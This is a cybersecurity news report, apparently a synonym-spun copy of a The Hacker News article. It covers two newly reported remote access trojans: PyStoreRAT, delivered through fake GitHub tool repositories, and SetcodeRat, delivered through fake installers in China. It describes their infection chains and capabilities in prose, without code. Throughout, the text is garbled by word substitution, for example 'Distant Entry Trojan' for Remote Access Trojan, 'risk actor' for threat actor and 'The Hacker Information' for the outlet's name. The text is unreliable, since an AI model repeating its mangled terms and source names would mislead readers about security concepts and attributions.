Cybersecurity researchers are calling consideration to a brand new marketing campaign that is leveraging GitHub-hosted Python repositories to distribute a beforehand undocumented JavaScript-based Distant Entry Trojan (RAT) dubbed PyStoreRAT.
“These repositories, typically themed as growth utilities or OSINT instruments, comprise just a few strains of code liable for silently downloading a distant HTA file and executing it by way of ‘mshta.exe,'” Morphisec researcher Yonatan Edri mentioned in a report shared with The Hacker Information.
PyStoreRAT has been described as a “modular, multi-stage” implant that may execute EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. The malware additionally deploys an info stealer often called Rhadamanthys as a follow-on payload.
Assault chains contain distributing the malware via Python or JavaScript loader stubs embedded in GitHub repositories masquerading as OSINT instruments, DeFi bots, GPT wrappers, and security-themed utilities which might be designed to enchantment to analysts and builders.
The earliest indicators of the marketing campaign return to mid-June 2025, with a gentle stream of “repositories” revealed since then. The instruments are promoted by way of social media platforms like YouTube and X, in addition to artificially inflate the repositories’ star and fork metrics – a method harking back to the Stargazers Ghost Community.
The risk actors behind the marketing campaign leverage both newly created GitHub accounts or those who lay dormant for months to publish the repositories, stealthily slipping the malicious payload within the type of “upkeep” commits in October and November after the instruments started to realize reputation and landed on GitHub’s prime trending lists.
The truth is, most of the instruments didn’t perform as they had been marketed, solely displaying static menus or non-interactive interfaces in some circumstances, whereas others carried out minimal placeholder operations. The intention behind the operation was to lend them a veneer of legitimacy by abusing GitHub’s inherent belief and deceiving customers into executing the loader stub that is liable for initiating the an infection chain.
This successfully triggers the execution of a distant HTML Utility (HTA) payload that, in flip, delivers the PyStoreRAT malware, which comes with capabilities to profile the system, test for administrator privileges, and scan the system for cryptocurrency wallet-related information, particularly these related to Ledger Stay, Trezor, Exodus, Atomic, Guarda, and BitBox02.
The loader stub gathers an inventory of put in antivirus merchandise and test strings matching “Falcon” (a reference to CrowdStrike Falcon) or “Purpose” (a reference to Cybereason or ReasonLabs) probably in an try to scale back visibility. Within the occasion they’re detected, it launches “mshta.exe” by the use of “cmd.exe.” In any other case, it proceeds with direct “mshta.exe” execution.
Persistence is achieved by establishing a scheduled process that is disguised as an NVIDIA app self-update. Within the closing stage, the malware contacts an exterior server to fetch instructions to be executed on the host. A number of the supported instructions are listed under –
- Obtain and execute EXE payloads, together with Rhadamanthys
- Obtain and extract ZIP archives
- Downloads a malicious DLL and executes it utilizing “rundll32.exe”
- Fetch uncooked JavaScript code and execute it dynamically in reminiscence utilizing eval()
- Obtain and set up MSI packages
- Spawn a secondary “mshta.exe” course of to load further distant HTA payloads
- Execute PowerShell instructions instantly in reminiscence
- Unfold by way of detachable drives by changing respectable paperwork with malicious Home windows Shortcut (LNK) information
- Delete the scheduled process to take away the forensic path
It is presently not recognized who’s behind the operation, however the presence of Russian-language artifacts and coding patterns alludes to a risk actor of probably Jap European origin, Morphisec mentioned.
“PyStoreRAT represents a shift towards modular, script-based implants that may adapt to safety controls and ship a number of payload codecs,” Edri concluded. “Its use of HTA/JS for execution, Python loaders for supply, and Falcon-aware evasion logic creates a stealthy first-stage foothold that conventional EDR options detect solely late within the an infection chain.”
The disclosure comes as Chinese language safety vendor QiAnXin detailed one other new distant entry trojan (RAT) codenamed SetcodeRat that is probably being propagated throughout the nation since October 2025 by way of malvertising lures. A whole lot of computer systems, together with these belonging to governments and enterprises, are mentioned to have been contaminated in a span of 1 month.
“The malicious set up bundle will first confirm the area of the sufferer,” the QiAnXin Risk Intelligence Heart mentioned. “If it’s not within the Chinese language-speaking space, it’s going to robotically exit.”
The malware is disguised as respectable installers for common packages like Google Chrome and proceeds to the following stage provided that the system language corresponds to Mainland China (Zh-CN), Hong Kong (Zh-HK), Macao (Zh-MO), and Taiwan (Zh-TW). It additionally terminates the execution if a connection to a Bilibili URL (“api.bilibili[.]com/x/report/click on/now”) is unsuccessful.
Within the subsequent stage, an executable named “pnm2png.exe” is launched to sideload “zlib1.dll,” which then decrypts the contents of a file referred to as “qt.conf” and runs it. The decrypted payload is a DLL that embeds the RAT payload. SetcodeRat can both connect with Telegram or a standard command-and-control (C2) server to retrieve directions and perform knowledge theft.
It permits the malware to take screenshots, log keystrokes, learn folders, set folders, begin processes, run “cmd.exe,” set socket connections, acquire system and community connection info, replace itself to a brand new model.
